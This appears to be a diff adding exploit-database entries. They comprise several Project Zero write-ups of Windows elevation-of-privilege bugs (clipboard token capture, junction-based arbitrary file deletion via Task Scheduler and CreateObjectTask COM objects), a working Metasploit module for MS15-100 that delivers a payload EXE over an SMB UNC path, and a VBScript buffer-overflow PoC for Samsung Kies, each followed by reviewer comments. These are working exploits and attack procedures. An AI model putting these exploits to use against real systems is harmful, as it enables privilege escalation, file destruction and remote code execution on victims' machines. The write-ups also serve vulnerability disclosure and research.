Platform: Windows 8.1 Update, Windows 10 Build 10130
Class: Security Bypass/EoP
Summary:
The NtUserGetClipboardAccessToken win32k system call exposes the access token of the last user to lower-privileged users. It can also be used to open an anonymous impersonation thread token which normally OpenThreadToken shouldn't be able to do. This is a bypass of the fix for CVE-2015-0078.
Description:
This was supposedly fixed as CVE-2015-0078 in MS15-023 to prevent access to the token from any process running below medium IL. The check is roughly:
if(IsImmersiveBroker() || CheckAccessForIntegrityLevelEx(0x2000)) {
ObOpenObjectByPointer(WinStationObject->ClipboardAccessToken, Access, TokenHandle);
}
This is possible to bypass because IsImmersiveBroker level is trivial to get. It seems Win32k sets the appropriate Win32Process flag when first initializing the process and converting it to a GUI thread. If the executable is signed by a Microsoft certificate and has a specially named section of “.imrsiv” the flag will be set, however this will be done regardless of the IL of the process. Therefore you can create a process using one of the pre signed executables, such as explorer.exe, RuntimeBroker.exe or LicensingUI.exe then inject a DLL into the process. This allows you to bypass the check and capture the token.
Ive had a quick look at what else might be exploitable from being able to get IsImmersiveBroker to return true. Nothing stands out but its probably worth restricted the IL level of processes allowed to get this flag set.
Proof of Concept:
Ive provided a PoC which will capture any token currently on the clipboard that it can access. It creates an instance of LicensingUI.exe and injects a DLL into it. Note the built executables are for x64 Windows, you'll need to rebuild to test on 32 bit. The password for the archive is "password".
1) Copy the PoC to a directory, including the executable and the DLL
2) Execute the Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe as a low integrity process. You can do this by marking the executable file with low IL using icacls or by using psexec.
3) Perform a clipboard operation, for example select some text and copy it to the clipboard
4) The PoC should show it has opened a token by opening a message dialog, if you inspect the tokens its likely to show a primary token has been captured with medium IL.
Expected Result:
It shouldnt be possible to capture the token.
Observed Result:
The token was captured in the low IL process.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38199.zip
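Review bot: the check pseudocode `IsImmersiveBroker() || CheckAccessForIntegrityLevelEx(0x2000)` is labelled "roughly" but the constant is left unexplained; 0x2000 is the medium integrity level RID, and saying so ties the snippet to the "below medium IL" statement in the sentence before it. The "Proof of Concept:" heading is duplicated (write-up and archive link); rename the second. Grammar: "worth restricted the IL level" should read "worth restricting the IL".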


@ -0,0 +1,32 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=442
Windows: Task Scheduler DeleteExpiredTaskAfter File Deletion Elevation of Privilege
Platform: Windows 8.1 Update, looks like it should work on 7 and 10 as well
Class: Elevation of Privilege
Summary:
The Task Scheduler can be made to delete a task after its trigger has expired. No check is made to ensure the task file is not a junction which allows arbitrary files to be deleted by the system user leading to EoP.
Description:
If a scheduled task is configured with DeleteExpiredTaskAfter setting the service will delete the task including its task file after the triggers have expired. It does the deletion in a timer callback thread but doesnt call DeleteFile with the privileges of the task, instead running at local system. While the scheduler now seems to do some checking on the path for junction attacks this only seems to be at creation time not when its deleting the task file. Therefore you can mount a junction attack against the deletion process which allows you to delete any file or directory on the system which local system can delete. To delete directories youd have to use a more advanced trick than just a directory junction as youd need to the point the task file to name::$INDEX_ALLOCATION but it will work.
The ability to deletes files is sufficient in some cases to elevate privileges because of the behaviour of other system processes and default permissions. For example system files created in ProgramData generally have privileges which prevent a user from modifying or replacing files, but not from creating new ones. You could use the attack to delete existing files then replace with hardlinks to overwrite system files.
Proof of Concept:
The PoC demonstrates the vulnerability deleting an arbitrary file from the system. You need to modify the $filetodelete variable to select a different file to test other than c:\protected\test
1) Copy the PoC to a location on a local hard disk and rename the files extension to .ps1.
2) Enable powershell scripting for the current user, this doesnt affect the actual exploit, its just to get powershell to execute the script.
2) As a normal user execute the powershell PoC
3) The PoC should complete execution.
Expected Result:
The service should detect the directory junction and not delete the target file
Observed Result:
The target file is deleted
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38200.ps1
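Review bot: the step list is numbered 1, 2, 2, 3; renumber it. The "Proof of Concept:" heading appears twice; rename the second, which holds only the script link. Step 2 says to enable PowerShell scripting for the current user without naming the mechanism; mentioning Set-ExecutionPolicy with -Scope CurrentUser would remove the guesswork. The Platform line says it "looks like it should work on 7 and 10 as well", but the Expected/Observed results were taken on 8.1 Update only; mark the other versions as untested.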


@ -0,0 +1,38 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=439
Windows: CreateObjectTask TileUserBroker Elevation of Privilege
Platform: Windows 8.1 Update (I dont believe its available in earlier Windows versions)
Class: Elevation of Privilege
Summary:
The CreateObjectTask scheduled task initializes a user accessible system COM service which allows you to instantiate the TileUserBroker COM object. This object doesnt take into account the caller when writing and deleting files leading to EoP.
Description:
The Microsoft\Windows\Shell\CreateObjectTask initializes a shell32 based ICreateObject COM server as local system. This is marked as being accessible from a normal user account so once created we can attach to it. The server only has one method, CreateObject which checks the CLSID against a list of known safe classes before allowing it to be instantiated. One of these classes is allows a user to set their account picture for the logon screen.
By calling CUserTileBroker::SetUserTile (implemented in Windows.UI.Immersive.dll) we can get the system service to write the account pictures to c:\users\public\AccountPictures\SID. Once the files are written it will try and delete any file not expected in that folder, this is done as the system user. We can abuse this functionality by placing a junction where the SID component is and point it to an arbitrary location. This would allow us to delete arbitrary files on the system or potentially replace a file with the one of the JPEGs (which are reencoded). Replacing files is trickier as the file names have a random GUID attached, however the service writes 5 files, so theres a race condition where the GUID could be read from one of those files then used to redirect the writes. Also the rencoding might make it difficult to inject any meaningful content.
If a user has not configured an account picture before (which probably means only local/domain users rather than Microsoft accounts) then the folder c:\users\public\AccountPictures\SID doesnt exist. Even if another user has set their picture on the same machine the AccountPictures directory has sufficient permissions to add a new directory in its place. If the user has configured their account picture then this will not work as the directory permissions of the SID directory are very restrictive.
The ability to deletes files is sufficient in some cases to elevate privileges because of the behaviour of other system processes and default permissions. For example system files created in ProgramData generally have privileges which prevent a user from modifying or replacing files, but not from creating new ones. You could use the attack to delete existing files then replace with hardlinks to overwrite system files.
Proof of Concept:
The PoC demonstrates the vulnerability deleting the file contents of an arbitrary directory passed on the command line. The password for the 7z file is password.
1) Extract the PoC to a location on a local hard disk
2) As a normal user execute the PoC pass the path to the directory to delete as the first parameter. For example poc.exe c:\windows\temp
3) The PoC should complete execution.
NOTE: If Access Denied is printed then its probably that the account picture has already been setup on the machine which makes the exploit not work.
Expected Result:
The system service should determine that it cannot delete the contents of the picture directory
Observed Result:
The passed path has all its files deleted (assuming they can be accessed by local system).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38201.zip
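Review bot: the precondition buried in the NOTE after step 3 (the behaviour is only reachable when c:\users\public\AccountPictures\<SID> does not already exist, i.e. the account picture has never been configured for that user) decides whether Expected/Observed Result can be reproduced at all, so it belongs in the Summary or at the top of Description rather than after the steps. Step 2 reads 'execute the PoC pass the path' and should be 'execute the PoC, passing the path of the directory to delete as the first parameter'; 'The ability to deletes files' should be 'to delete files', and 'doesnt'/'theres' are missing apostrophes. The Description already identifies the root cause (the cleanup of unexpected files in the AccountPictures folder runs as local system without regard to the caller), so Expected Result could state the concrete fix to test for: the service should impersonate the calling user for the write and delete, or refuse a reparse point on the SID component of the path.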

View file

@ -0,0 +1,35 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=437
Windows: CreateObjectTask SettingsSyncDiagnostics Elevation of Privilege
Platform: Windows 8.1 Update (I dont believe its available in earlier Windows versions)
Class: Elevation of Privilege
Summary:
The CreateObjectTask scheduled task initializes a user accessible system COM service which allows you to instantiate the SettingsSyncDiagnostics COM object. This object doesnt take into account the caller when copying logs files leading to EoP.
Description:
The Microsoft\Windows\Shell\CreateObjectTask initializes a shell32 based ICreateObject COM server as local system. This is marked as being accessible from a normal user account so once created we can attach to it. The server only has one method, CreateObject which checks the CLSID against a list of known safe classes before allowing it to be instantiated. One of these classes is a diagnostic class for setting synchronization implemented in SettingSync.dll.
This class allows an event log to be initialized with the StartLogging method and then the logs copied to an arbitary location with the StopLogging method. The StopLogging method doesnt impersonate the caller when moving the logs to the user defined location which means it runs as local system. Its possible to use this to copy the log files to arbitrary locations using appropriate symbolic link attacks. We can get data into the log file by sending trace events to the appropriate provider, this could allow string data to be added to the file. The name of the file is under attacker control so it can be renamed to .hta or .ps1 which would allow the limited control over the contents to be abused in error tolerant script engines.
Another way of exploiting this takes into account that the SHFileOperations call which moves the file resets the ACLs (where applicable) on the file to match the expected inherited permissions. So for example you could drop the file as c:\program.exe and it would pick up the default DACL for C:\ (which allows Authenticated Users modify permissions) but the call doesnt reapply the High IL label. This could be used indirectly in bad system services with unquoted file paths as the normal user could re-write the files contents to an malicious executable. A second trick with this is theres a race between the move and the resetting of the ACLs. As the shell uses TreeSetNamedSecurityInfo it will also walk directory hierarchies, therefore by switching the symlink from the original target to a directory (say c:\users) you can force parts of the system drive to reset their ACLs, leading to the user being able to modify new parts of the file system which again could be exploited..
Exploitation is complicated somewhat by a bug in the proxy in actxprxy.dll. Presumably in the original MIDL file for the COM object the StopLogging method is incorrectly marked, the single WCHAR* parameter is missing the [string] attribute. This results in the built-in proxy only marshalling a single WCHAR to the server, this tends to cause things to not work so well and leads to a limited information disclosure as whatevers after the single character in memory up to the next NUL is assumed to be part of the path. Fortunately the stub is sufficiently simple that by sending a plain array buffer to the server itll pick up the correct data. Ive done this in the PoC by implementing my own custom COM proxy object.
Proof of Concept:
The PoC demonstrates the vulnerability by copying the log file to the system drive. The password for the 7z file is password.
1) Extract the PoC to a location on a local hard disk
2) As a normal user execute the PoC.
3) The PoC should complete execution.
Expected Result:
The log file should fail to be moved to the specified target.
Observed Result:
The log file ends up copied to c:\program.exe and can be modified by the current user.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38202.zip
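Review bot: this file describes three distinct issues (StopLogging moving the log as local system without impersonating the caller; SHFileOperations resetting ACLs but not the High IL label on the moved file, plus the race via TreeSetNamedSecurityInfo that can re-ACL a directory tree if the symlink is switched; and the missing [string] attribute on StopLogging's WCHAR* parameter in the actxprxy.dll proxy, which the text says exposes memory after the first character up to the next NUL) but Expected/Observed Result covers only one. State which behaviour the PoC exercises (the observed result, c:\program.exe becoming modifiable by the current user, is the ACL-reset variant) and whether the proxy marshalling leak is being reported as a finding in its own right, since a fix to the impersonation alone would not address it. Typos: 'arbitary' should be 'arbitrary', 'an malicious' should be 'a malicious', 'files contents' should be 'file's contents', there is a doubled full stop after 'could be exploited', and 'whatevers'/'Ive'/'itll'/'theres' are missing apostrophes.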

View file

@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share
def initialize(info={})
super(update_info(info,
'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
'Description' => %q{
This module exploits a vulnerability in Windows Media Center. By supplying
an UNC path in the *.mcl file, a remote file will be automatically downloaded,
which can result in arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r',
],
'References' =>
[
['CVE', '2015-2509'],
['MSB', 'MS15-100']
],
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'false'
},
'Platform' => 'win',
'Targets' =>
[
['Windows', {}],
],
'Privileged' => false,
'DisclosureDate' => "Sep 8 2015",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])
], self.class)
deregister_options('FILE_CONTENTS')
end
def generate_mcl
%Q|<application run="#{unc}" />|
end
def primer
self.file_contents = generate_payload_exe
print_status("Malicious executable at #{unc}...")
print_status("Creating '#{datastore['FILENAME']}' file ...")
mcl = generate_mcl
file_create(mcl)
end
end
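Review bot: the options FILENAME and FILE_NAME differ only by an underscore and their descriptions do not explain how they relate. FILENAME is the local .mcl file written by file_create, while FILE_NAME (registered by the Msf::Exploit::Remote::SMB::Server::Share mixin, which also supplies 'unc' and 'file_contents') is the name the generated executable is served under on the module's SMB share and is what appears in the UNC path emitted by generate_mcl ('<application run="#{unc}" />'); suggest describing FILE_NAME as 'The file name the payload EXE is served under on the SMB share (used in the MCL UNC path)'. The Description should also spell out the delivery requirements that follow from the code: the target must open the .mcl file in Windows Media Center and must be able to reach the module's SMB share, so the module does nothing against hosts whose outbound SMB is filtered; that is the detail defenders will want next to the MS15-100 reference. Minor: 'an UNC path' should be 'a UNC path'.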

View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/57249/info
Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition.
<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v.
2.5.0.12114_1 </title>
</head>
<script language='vbscript'>
Sub PoC()
arg1="defaultV"
arg2=String(14356, "A")
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech
Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value="Proof of
Concept">
</body>
<object
classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8'id='Target'></object>
</html>
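Review bot: the markup places the <script> block between </head> and <body> and the <object> element after </body>, and both the <title> text and the button's value attribute are wrapped across lines (the value becomes 'Proof of' followed by a line break and 'Concept'); browsers tolerate all of this, but the PoC should move <script> and <object> inside <body> and join the wrapped attribute so the file reads cleanly. The description says input is copied into a fixed-length buffer without length validation but does not say which PrepareSync parameter is affected; the script makes it the second argument (arg2, 14356 characters), which is worth stating explicitly. No fixed version and no mitigation are given; since the control is instantiated in the browser by CLSID EA8A3985-F9DF-4652-A255-E4E7772AFCA8, the standard workaround of preventing that CLSID from being instantiated by Internet Explorer (kill bit) is the mitigation to document until a patched Kies build is named.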